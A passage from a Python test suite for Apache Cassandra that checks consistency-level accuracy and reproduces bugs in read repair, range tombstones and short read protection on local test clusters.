exceptions_queue = queue.Queue()
def run():
while not input_queue.empty():
try:
v = TestAccuracy.Validation(self, self.sessions, nodes, rf_factors, *input_queue.get(block=False))
valid_fcn(v)
except queue.Empty:
pass
except Exception:
exceptions_queue.put(sys.exc_info())
start = 0
num_keys = 50
for combination in combinations:
input_queue.put((start, start + num_keys) + combination)
start += num_keys
threads = []
for n in range(0, 8):
t = threading.Thread(target=run)
t.setDaemon(True)
t.start()
threads.append(t)
logger.debug("Waiting for workers to complete")
while exceptions_queue.empty():
time.sleep(0.1)
if len([t for t in threads if t.isAlive()]) == 0:
break
if not exceptions_queue.empty():
_, exceptions, tracebacks = list(zip(*exceptions_queue.queue))
raise MultiError(exceptions=exceptions, tracebacks=tracebacks)
@pytest.mark.resource_intensive
def test_simple_strategy_users(self):
"""
Test for a single datacenter, users table, only the each quorum reads.
"""
self.nodes = 5
self.rf = 3
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
# These are multi-DC consistency levels that should default to quorum calls
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
]
logger.debug("Testing single dc, users")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_simple_strategy_each_quorum_users(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, users table, only the each quorum reads.
"""
self.nodes = 5
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, users, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_users(self):
"""
Test for multiple datacenters, users table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
logger.debug("Testing multiple dcs, users")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations),
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_users(self):
"""
@jira_ticket CASSANDRA-10584
Test for a multiple datacenters, users table, only the each quorum
reads.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing multiple dcs, users, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations)
def test_simple_strategy_counters(self):
"""
Test for a single datacenter, counters table.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
# These are multi-DC consistency levels that should default to quorum calls
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
]
logger.debug("Testing single dc, counters")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@since("3.0")
def test_simple_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, counters table, only the each quorum
reads.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, counters, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_counters(self):
"""
Test for multiple datacenters, counters table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
]
logger.debug("Testing multiple dcs, counters")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations),
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for multiple datacenters, counters table, only the each quorum
reads.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing multiple dcs, counters, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations),
class TestConsistency(Tester):
@since('3.0')
def test_14513_transient(self):
"""
@jira_ticket CASSANDRA-14513
A reproduction / regression test to illustrate CASSANDRA-14513:
transient data loss when doing reverse-order queries with range
tombstones in place.
This test shows how the bug can cause queries to return invalid
results by just a single node.
"""
cluster = self.cluster
# set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
cluster.set_configuration_options(values={'column_index_size_in_kb': 1})
cluster.populate(1).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 1};"
session.execute(query)
query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));';
session.execute(query)
# populate the table
stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);');
for year in range(2011, 2018):
for month in range(1, 13):
for day in range(1, 31):
session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'], ConsistencyLevel.ONE)
node1.flush()
# make sure the data is there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.ONE)
# generate an sstable with an RT that opens in the penultimate block and closes in the last one
stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
batch = BatchStatement(batch_type=BatchType.UNLOGGED)
for day in range(1, 31):
batch.add(stmt, ['beobal', 2018, 1, day])
session.execute(batch)
node1.flush()
# the data should still be there for years 2011-2017, but prior to CASSANDRA-14513 it would've been gone
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.ONE)
@since('3.0')
def test_14513_permanent(self):
"""
@jira_ticket CASSANDRA-14513
A reproduction / regression test to illustrate CASSANDRA-14513:
permanent data loss when doing reverse-order queries with range
tombstones in place.
This test shows how the invalid RT can propagate to other replicas
and delete data permanently.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
# set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
cluster.set_configuration_options(values={'column_index_size_in_kb': 1, 'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 3};"
session.execute(query)
query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));';
session.execute(query)
# populate the table
stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);');
for year in range(2011, 2018):
for month in range(1, 13):
for day in range(1, 31):
session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'], ConsistencyLevel.QUORUM)
cluster.flush()
# make sure the data is there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.QUORUM)
# take one node down
node3.stop(wait_other_notice=True)
# generate an sstable with an RT that opens in the penultimate block and closes in the last one
stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
batch = BatchStatement(batch_type=BatchType.UNLOGGED)
for day in range(1, 31):
batch.add(stmt, ['beobal', 2018, 1, day])
session.execute(batch, [], ConsistencyLevel.QUORUM)
node1.flush()
node2.flush()
# take node2 down, get node3 up
node2.stop(wait_other_notice=True)
node3.start()
# insert an RT somewhere so that we would have a closing marker and RR makes its mutations
stmt = SimpleStatement("DELETE FROM journals.logs WHERE user = 'beobal' AND year = 2010 AND month = 12 AND day = 30",
consistency_level=ConsistencyLevel.QUORUM)
session.execute(stmt)
# this read will trigger read repair with the invalid RT and propagate the wide broken RT,
# permanently killing the partition
stmt = SimpleStatement("SELECT * FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
consistency_level=ConsistencyLevel.QUORUM)
session.execute(stmt)
# everything is gone
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal';",
[[7 * 12 * 30]],
cl=ConsistencyLevel.QUORUM)
@since('3.0')
def test_14330(self):
"""
@jira_ticket CASSANDRA-14330
A regression test to prove that we no longer trigger
AssertionError during read repair in DataResolver
when encountering a repeat open RT bound from short
read protection responses.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node2)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with all nodes up, insert an RT and 2 rows on every node
#
# node1 | RT[0...] 0 1
# node2 | RT[0...] 0 1
session.execute('DELETE FROM test.test USING TIMESTAMP 0 WHERE pk = 0 AND ck >= 0;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 1;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 1;')
# with node1 down, delete row 0 on node2
#
# node1 | RT[0...] 0 1
# node2 | RT[0...] x 1
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test USING TIMESTAMP 1 WHERE pk = 0 AND ck = 0;')
node1.start(wait_for_binary_proto=True)
# with both nodes up, make a LIMIT 1 read that would trigger a short read protection
# request, which in turn will trigger the AssertionError in DataResolver (prior to
# CASSANDRA-14330 fix)
assert_all(session,
'SELECT ck FROM test.test WHERE pk = 0 LIMIT 1;',
[[1]],
cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13911(self):
"""
@jira_ticket CASSANDRA-13911
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down, insert row 0 on node1
#
# node1, partition 0 | 0
# node2, partition 0 |
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0);')
node2.start(wait_for_binary_proto=True)
# with node1 down, delete row 1 and 2 on node2
#
# node1, partition 0 | 0
# node2, partition 0 | x x
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2);')
node1.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 1;
# prior to CASSANDRA-13911 this would trigger an IllegalStateException
assert_all(session,
'SELECT DISTINCT pk FROM test.test;',
[[0]],
cl=ConsistencyLevel.ALL)
@since('3.11')
@ported_to_in_jvm('4.0')
def test_13911_rows_srp(self):
"""
@jira_ticket CASSANDRA-13911
A regression test to prove that we can no longer rely on
!singleResultCounter.isDoneForPartition() to abort single
partition SRP early if a per partition limit is set.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down
#
# node1, partition 0 | 0 1 - -
# node1, partition 2 | 0 x - -
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 1;')
node2.start(wait_for_binary_proto=True)
# with node1 down
#
# node2, partition 0 | - - 2 3
# node2, partition 2 | x 1 2 -
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 0;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 2) USING TIMESTAMP 42;')
node1.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 3;
# without the change to if (!singleResultCounter.isDoneForPartition()) branch,
# the query would skip SRP on node2, partition 2, and incorrectly return just
# [[0, 0], [0, 1]]
assert_all(session,
'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 3;',
[[0, 0], [0, 1],
[2, 2]],
cl=ConsistencyLevel.ALL)
@since('3.11')
@ported_to_in_jvm('4.0')
def test_13911_partitions_srp(self):
"""
@jira_ticket CASSANDRA-13911
A regression test to prove that we can't rely on
!singleResultCounter.isDone() to abort ranged
partition SRP early if a per partition limit is set.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down
#
# node1, partition 0 | 0 1 - -
# node1, partition 2 | x x - -
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck IN (0, 1);')
node2.start(wait_for_binary_proto=True)
# with node1 down
#
# node2, partition 0 | - - 2 3
# node2, partition 2 | 0 1 - -
# node2, partition 4 | 0 1 - -
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 1) USING TIMESTAMP 42;')
node1.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 4;
# without the extra condition in if (!singleResultCounter.isDone()) branch,
# the query would skip partitions SRP on node2 at the end of partition 2,
# and incorrectly return just [[0, 0], [0, 1]]
assert_all(session,
'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 4;',
[[0, 0], [0, 1],
[4, 0], [4, 1]],
cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13880(self):
"""
@jira_ticket CASSANDRA-13880
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
session.execute(query)
stmt = SimpleStatement("INSERT INTO test.test (id) VALUES (0);",
consistency_level=ConsistencyLevel.ALL)
session.execute(stmt)
# with node2 down and hints disabled, delete the partition on node1
node2.stop(wait_other_notice=True)
session.execute("DELETE FROM test.test WHERE id = 0;")
node2.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 1;
# prior to CASSANDRA-13880 this would cause short read protection to loop forever
assert_none(session, "SELECT DISTINCT id FROM test.test WHERE id = 0;", cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13747(self):
"""
@jira_ticket CASSANDRA-13747
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
session.execute(query)
#
# populate the table with 10 rows:
#
# -7509452495886106294 | 5
# -4069959284402364209 | 1 x
# -3799847372828181882 | 8
# -3485513579396041028 | 0 x
# -3248873570005575792 | 2
# -2729420104000364805 | 4 x
# 1634052884888577606 | 7
# 2705480034054113608 | 6 x
# 3728482343045213994 | 9
# 9010454139840013625 | 3 x
stmt = session.prepare("INSERT INTO test.test (id) VALUES (?);")
for id in range(0, 10):
session.execute(stmt, [id], ConsistencyLevel.ALL)
# with node2 down and hints disabled, delete every other row on node1
node2.stop(wait_other_notice=True)
session.execute("DELETE FROM test.test WHERE id IN (1, 0, 4, 6, 3);")
# with both nodes up, do a DISTINCT range query with CL.ALL;
# prior to CASSANDRA-13747 this would cause an assertion in short read protection code
node2.start()
stmt = SimpleStatement("SELECT DISTINCT token(id), id FROM test.test;",
consistency_level=ConsistencyLevel.ALL)
result = list(session.execute(stmt))
assert_length_equal(result, 5)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13595(self):
"""
@jira_ticket CASSANDRA-13595
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2)
node1, node2 = cluster.nodelist()
cluster.start()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);'
session.execute(query)
# populate the table with 10 partitions,
# then delete a bunch of them on different nodes
# until we get the following pattern:
# token | k | 1 | 2 |
# -7509452495886106294 | 5 | n | y |
# -4069959284402364209 | 1 | y | n |
# -3799847372828181882 | 8 | n | y |
# -3485513579396041028 | 0 | y | n |
# -3248873570005575792 | 2 | n | y |
# -2729420104000364805 | 4 | y | n |
# 1634052884888577606 | 7 | n | y |
# 2705480034054113608 | 6 | y | n |
# 3728482343045213994 | 9 | n | y |
# 9010454139840013625 | 3 | y | y |
stmt = session.prepare('INSERT INTO test.test (id) VALUES (?);')
for id in range(0, 10):
session.execute(stmt, [id], ConsistencyLevel.ALL)
# delete every other partition on node1 while node2 is down
node2.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE id IN (5, 8, 2, 7, 9);')
node2.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node2)
# delete every other alternate partition on node2 while node1 is down
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE id IN (1, 0, 4, 6);')
node1.start(wait_for_binary_proto=True)
session = self.patient_exclusive_cql_connection(node1)
# until #13595 the query would incorrectly return [1]
assert_all(session,
'SELECT id FROM test.test LIMIT 1;',
[[3]],
cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_12872(self):
"""
@jira_ticket CASSANDRA-12872
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));"
session.execute(query)
stmt = session.prepare("INSERT INTO test.test (pk, ck) VALUES (0, ?);")
for ck in range(0, 4):
session.execute(stmt, [ck], ConsistencyLevel.ALL)
# node1 | up | 0 1 2 3
# node2 | up | 0 1 2 3
node2.stop(wait_other_notice=True)
# node1 | up | 0 1 2 3
# node2 | down | 0 1 2 3
session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2, 3);')
# node1 | up | 0 x x x
# node2 | down | 0 1 2 3
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 5);')
# node1 | up | 0 x x x 5
# node2 | down | 0 1 2 3
node2.start()
node1.stop(wait_other_notice=True)
# node1 | down | 0 x x x 5
# node2 | up | 0 1 2 3
session = self.patient_cql_connection(node2)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 4);')
# node1 | down | 0 x x x 5
# node2 | up | 0 1 2 3 4
node1.start()
# node1 | up | 0 x x x 5
# node2 | up | 0 1 2 3 4
assert_all(session,
'SELECT ck FROM test.test WHERE pk = 0 LIMIT 2;',
[[0], [4]],
cl=ConsistencyLevel.ALL)
@ported_to_in_jvm('4.0')
def test_short_read(self):
"""
@jira_ticket CASSANDRA-9460
"""
cluster = self.cluster
# This test causes the python driver to be extremely noisy due to
# frequent starting and stopping of nodes. Let's move the log level
# of the driver to ERROR for this test only
logging.getLogger("cassandra").setLevel('ERROR')
# Disable hinted handoff and set batch commit log so this doesn't
# interfer with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0)
else:
create_cf(session, 'cf')
normal_key = 'normal'
reversed_key = 'reversed'
# insert 9 columns in two rows
insert_columns(self, session, normal_key, 9)
insert_columns(self, session, reversed_key, 9)
# Delete 3 first columns (and 3 last columns, for the reversed version) with a different node dead each time
for node, column_number_to_delete in zip(list(range(1, 4)), list(range(3))):
self.stop_node(node)
self.delete(node, normal_key, column_number_to_delete)
self.delete(node, reversed_key, 8 - column_number_to_delete)
self.restart_node(node)
# Query 3 firsts columns in normal order
session = self.patient_cql_connection(node1, 'ks')
query = SimpleStatement(
'SELECT c, v FROM cf WHERE key=\'k{}\' LIMIT 3'.format(normal_key),
consistency_level=ConsistencyLevel.QUORUM)
rows = list(session.execute(query))
res = rows
assert_length_equal(res, 3)
# value 0, 1 and 2 have been deleted
for i in range(1, 4):
assert 'value{}'.format(i + 2) == res[i - 1][1]
# Query 3 firsts columns in reverse order
session = self.patient_cql_connection(node1, 'ks')
query = SimpleStatement(
'SELECT c, v FROM cf WHERE key=\'k{}\' ORDER BY c DESC LIMIT 3'.format(reversed_key),
consistency_level=ConsistencyLevel.QUORUM)
rows = list(session.execute(query))
res = rows
assert_length_equal(res, 3)
# value 6, 7 and 8 have been deleted
for i in range(0, 3):
assert 'value{}'.format(5 - i) == res[i][1]
session.execute('TRUNCATE cf')
@ported_to_in_jvm('4.0')
def test_short_read_delete(self):
""" Test short reads ultimately leaving no columns alive [#4000] """
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
